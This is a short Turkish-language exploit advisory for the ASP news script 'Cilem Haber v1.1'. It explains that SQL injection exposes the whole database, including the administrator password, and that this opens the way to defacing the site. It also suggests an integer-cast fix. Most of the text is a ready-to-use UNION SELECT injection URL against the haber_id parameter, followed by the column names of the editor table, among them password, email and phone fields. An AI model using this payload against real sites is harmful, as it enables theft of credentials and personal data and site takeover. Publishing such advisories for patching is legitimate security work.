< ------------------- header data start ------------------- >

#############################################################

# Application Name : Cilem Haber v1.1

# Vulnerable Type : SQL Injection

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

http://victim.com/path/haber_detay.asp?haber_id=97+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13+from+editorluk

Editorluk Kolonlar ;
uyeid
uye_onay
editor
sifre
isimsoyad
tanitim
sehir
ilce
telefon
gsmno
internet_adresi
siteadi
email
tarih

< -- bug code end of -- >